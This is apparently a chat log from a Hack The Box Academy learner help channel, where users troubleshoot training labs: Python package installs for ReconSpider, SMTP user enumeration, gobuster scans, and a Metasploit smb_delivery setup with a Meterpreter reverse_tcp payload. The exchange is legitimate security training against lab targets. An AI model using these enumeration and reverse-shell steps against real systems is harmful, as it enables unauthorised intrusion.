tl;dr just get to the point of what you're stuck on and where

i've tried it with pacman but python-scrapy doesn't exist

then sudo pip install scrapy --break-system-packages

you can delete the externally managed file but you'd need to find it first

might be python3-scrapy, like in apt?

likely

good thing to do is apt search <stuff>, it will likely exists in pacman

hi, i'm doing the information gathering - web edition, i'm at the skills assessment part, there is only this questions left : What is the API key in the hidden admin directory that you have discovered on the target system? If someone can help me to answer please

check for robots

i found this, could it be the one?

yeah i found /ad.......

yeah... so visit that page/dir

yep

that just prevents you from needing to add the --break-system-packages

i'm so bad i couldn't access it because i hadn't specified the machine port because it disappears when you access the site. Thanks for helping me !

okay so i delete the externally-managed and then try again right

js to make sure

nvm i got it

appreciate the help marcie!

the real command is --break-other-people-system-packages.........

Hi all, on cpts information gathering web edition page 7 subdomain brute forcing.. from the wording of the question I understand that I am supposed to run a bruteforce on the already found subdomains to uncover the missing subdomains. Is that correct?

I already have completed this module (Broken Authentication) but after update I cannot check whether my answer is correct or not because old answers are already filled.
So what should I do to check my answer?

hello, i get what you mean about the question. just focus on the part:" find any missing subdomains by brute-forcing possible domain names."

thanks

did you figure it out?

Still working on it.. going through all the wordlists in the seclist DNS folder again for the main domain

you might want to focus on those in the course

alot of subdomain bruteforcing tools have recursive options as well. So something to keep in mind for the future

that's apparently a known issue on updated modules. If you already earned back cubes, you can't earned them back twice. No solutions as far as i know, so you'll just have to know by yourself when it is right

Can I ask to support?
Will they help ?

I dont know. Everyone has the issue, so if it could be resolved, it would have been resolved already. check this post: #modules message

I did try that with dnsenum, but that didnt work, because there were no NS records found.. I am still going through the list.. if not I will try a different tool

are you using inlanefreight.com and not inlanefreight.htb? just double check that

.com

in "The Live Engagement" of the shells and payloads module, am i forced to use parrot? can i just use my kali vm instead?

Module : Footprinting
Section : SMTP
URL : https://academy.hackthebox.com/module/112/section/1072

I don't understand what I'm supposed to do in the last question.
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

Considering :

• The content of the course : ||Therefore, one should never entirely rely on the results of automatic tools.||
• The absence of command other than telnet in the cheat-sheet
• The hint : ||We recommend to use the Footprinting-wordlist provided as resource.||

I'm wondering if I am supposed to go throught the wordlist manually while typing VRFY commands ?
Any hint would be appreciated.

you can pivot to use your own vm

any one solved this Creepy Crawlies
in information gathering -web addtion

you mean setting up a socks proxy?

you can use any pivoting techniques you want

yes i did it not long ago... what can i do to help?

the recondspider.py dont work

did you install scrapy first?

recon spider is very straightforward.. may i see the command you used to run it?

can i dm u

you can just copy the command and paste it here

no one will argue against that...especially if you delete the message afterwards

python3 ReconSpider.py inlanefreight.com

try http://

i want to show u the replay

python3 ReconSpider.py http://inlanefreight.com

still didnt work

if u scroll up js a bit you can see i have the same issue

lemme check

got scrapy installed

this is what it gives me when running the command

you could try with the tool smtp-user-enum if you dont want to go for it manually

try with sudo

not sudo... do not use pip3 install with sudo

and no sudo with python scripts unless it is really needed

change the directory you are in

i am not using sudo

what is your operating system?

PermissionError: [Errno 13] Permission denied: 'results.json'

means you have not the permissions to write in the directory

yeah... run the script from /home/yourusername/Desktop

Thanks but no success with it.
smtp-user-enum -M VRFY -U ~/Desktop/footprinting-wordlist.txt -t 10.129.61.15

kali linux

(Using the provided wordlist*)

did you install it from scratch or a pre-built image?

i will restart and try again now

in my notes i see i had to up the timeout to 15secs, it is 5 by default, dont know if that could help

do not install kali from an iso. use a vm image such as virtualbox or vmware

yeah i on vm

yeah but on the vm... did you use an iso to set up kali? or a pre-built ready to use image?

it's fine to install via iso

but isn't this just a simple permission error

its recommended to use an image...

yes but installing via iso is also fine

i will try on the HTB instance

youre probly right butif he fiddled stuff and broke his kali.... its best to try a fresh install and just use

pip3 install scrappy

and then try again

or a snapshot to revert

huh why do all that

just run it in a dir you have write perms at

hold on i thought you were troubleshooting something else.. .youre right just use the damn script from your desktop

gives me this

what about this huge error?

when i try to run reconspider it gave me this: No module named 'scrapy.downloadermiddlewares.offsite' is it possible to add this to the py script manually? (i do have scrapy installed)

yeah thats the eerror i want him to start fresh for

||With 20sec timeout it worked successfully. I don't get how a timeout can fool the brute force script, but anyway tyvm for your help 🙏 ||

should be a godwin point for troubleshooting to full reinstall

what should i do then

even oon instance gives me this

i cant help you... im sorry its too time consuming.. perhaps someone else can tackle this for you later

add --break-system-packages at the end it should work

atleast it did for me

yeah but i doubt it

oh ... okay lets hope this works for him

it will work with break stuff but well...

sometimes it takes sacrifice to make things work ig lmao

if it is the pwnbiox indeed, add break packages like said above

if it is your box, you should learn to set up pyenv and manage your python environments

when i was first using kali back in 2020, i broke pip. It was the quickest way to revert because i was using vmware free version that didnt have snapshots. thats why.

as absurd as it sounds... it happened.

unable to update pip either it seems

pip3 =/= pip

i guess because the smtp server is slow to answer to our requests

python3 -m venv temp-env
source temp-env/bin/activate
pip3 install scrapy

run this ^

no way on earth YOU ARE HIM

tried this in pwnbox i didn't receive an error

looks good

generally if you need to use --break-system-packages, you're doing it wrong

so this creates like a temporary python environment or?

exactly

well not temporary, I just named it that way, it's just an env, any changes you make to packages will be contained in there

ah i see

that helps alot

appreciate it

in active directory how to know the resources(file server or web server for example) that is allowed for specific user

you can check the ACL using powerview, bloodhound etc

acl of every resource or acl of the specific user?

you can do both if you want, depends on what information you want to see

can someone explain why this isnt working im following the module. windows server in the windows privlige escalation module

0.0.0.0 is a valid listen address but can't be used to connect, think about which IP you should use

it shoud be my tun 0

so my tun0 didnt work

check your msf options

and your LHOST is set to your local ip

no, you check it yourself

how do i find out how to hack

ask XreOuS

Xre0us tell me 🥺

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hi guys, I started with HTB recently and I am stuck on Getting Started module, Web enumeration module.

1. my viurtal lab provided was missing dirb folder/tool - but I solved by just creating it from github

2. after running gobuster dir ... it did not find /wordpress nor it exists when I try to access it via browser.

Is it possible the module / pwnmachine spawned is wrong?

are you doing http://ip:port?

yes

the :port part is critical because the web service is not running on 80

ok i like looked at the website

lets test my hacking skills

but also /wordpress isn't where the answer is

and got a account

robots.txt is also missing when running gobuster

/hack GoldsunJ = say no

huh i dont think i know how to hack

that's not how this works, read and follow #rules and #welcome

what is your command you're running

does it tell me how to hack in rules

no it tells you what the rules of the server are

gobuster dir -u http://94.237.59.63:50006/ -w /usr/share/dirb/wordlists/common.txt

restart your target

ive tried a number of combinations but im not sure what im missing. im doing this in my kali machine since its not working on the website

you're missing: RHOST (remote Host); LHOST (your tun0)

I did twice today and twice yesterday.
I restarted it again and ran nmap -sV on it first and I get Not shown: 915 filtered tcp ports (no-response), 85 closed tcp ports (reset)

you don't need to nmap scan the public_IP

you're given a port to work with

whenever htb gives you an IP:PORT to work with; that's your scope to work with

no other ports on that host are in your scope

Makes sense. Thanks.

im using the ip given in the practical and my tun 0

because it's trying to bind to the remote host for SMB...which is already running

i am doing this in my kali because something is up with the module on the web

what is it supposed to look like

reading the options tells you what each option does

The local host or network interface to listen on. This MUST be an address on the local machine

if i set the srvhost as the target and the lhost as my tun0 it does not work

if i set the srvhost to my kali ip it does not work

...

brother

i want you to read the words very carefully

it has to be LOCAL

as in on the machine you're running the exploit frum

if you are in the privesc module, section dealing with end of life systems, windows server, the example is quite explicit. under the title Obtaining a Meterpreter Shell

yea im not too sure cause every combination fails

without seeing whats happening its going to be hard to see whats wrong

ok

let me take this one step slower

LHOST; tun0 -- SRVHOST; tun0

ok let me try

that's the course

msf6 exploit(windows/smb/smb_delivery) > show options 

Module options (exploit/windows/smb/smb_delivery):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_NAME    test.dll         no        DLL file name
   FOLDER_NAME                   no        Folder name to share (Default none)
   SHARE                         no        Share (Default Random)
   SRVHOST      10.10.14.3       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT      445              yes       The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.3       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   1   PSH

i got cookie but after decoding via cyberchef website its still giving wrong any help

it helps if you give us the module name and section name

@fathom pendant module:- USING WEB PROXIES & section skill assesment

im going to run it

what... section

skill-assesment

the value should be 3...a

yah i got it

make sure no extra spaces in your answer

well it looks like it ran the test.dll

now switch the filename to your payload you want to serve

Try replacing 0.0.0.0 to the local ip address of the machine

Oh, you did that?

yeah he's already done that

my screenshto was just of the setting description

i tried almost any combination and it just gives this and does not do the next step

¯_(ツ)_/¯

does not send stage

Are both on the same network?

yes

(Connected to the same wifi)

i see this in my notes on that section: Try to pay attention to payload x64 or x86, sessions 64 or 32 etc.
whatever that could mean.... : D

you're not really adding anything, he can't be connected to the machine in the first place if he's not on the network

Just to make sure

@fathom pendant thank you it was again spacing

he can't be xfreerdped into the machine if he's not on the network

don't dm people without asking btw

@fathom pendant ok sir

if anyone wants to watch me stream it on screen share so were on the same page that would be cool

no

i'm not that cool

🫤

2 things: 1) you can't screenshare in the discord anyway; 2) that requires dming

its so much easier to see whats happening

did you try to check what i sent you in a previous message about payloads etc

i guess i had the same issue

also

according to your one screenshot it worked

it did not initiate the meterpreter

or send stage

who said test.dll was a revshell

Thank you so much!

the course is saying we got a revshell back

from test.dll?

or from the payload you crafted?

so far he's only launching it with the test payload

and isn't with the crafted payload

from test, it is in the smb delivery msf module

ah

then it could be an architecture issue then

as you said

this is what options looks like after starting msf

no edits

set the srvhost and lhost again and try it again

or restart target and try it again

set it to my tun 0 which is 10.10.16.52

?

yes

did you also run the SetExecutionPolicy command?

in powershell?

your lhost looks like something that wouldn't be on htb

he just reset the msfconsole

so it's default

i am using my kali because something wont let me log in on the web page

so i used the vpn file and 10.10.16.52 is my tun 0

did you turn off the pwnbox while using kali?

yes i just have the target active

worked for me

change region try again maybe

network path is not found, so the target can't reach your smb server

you still have your LHOST to you local network

he fixed it

tbh, just copy a revshell payload over lmao

all this work just to get a msf shell

did you try to change the payload to x86?

the target is x64 I think

no im not sure how to change it

payload doesn't matter if the target can't reach the host

@wary tendon set lhost tun0

trying to reset everything

set payload windows/meterpreter/reverse_tcp

it should auto-set

yeah perhaps i just guess if i have noted that about the payload it has to be for something. And i also assume the options are now set up correctly. so could be a waste of time

The first error to deal with is right there in the screen shot, the target cannot reach the host

if all the settings look correct, try changing regions. it wouldn't be the first time i've seen changing regions fix weird issues like this. just happened the other night with someone else.

cant log in no same issue as yesterday

rdp i mean

and remmina doesnt work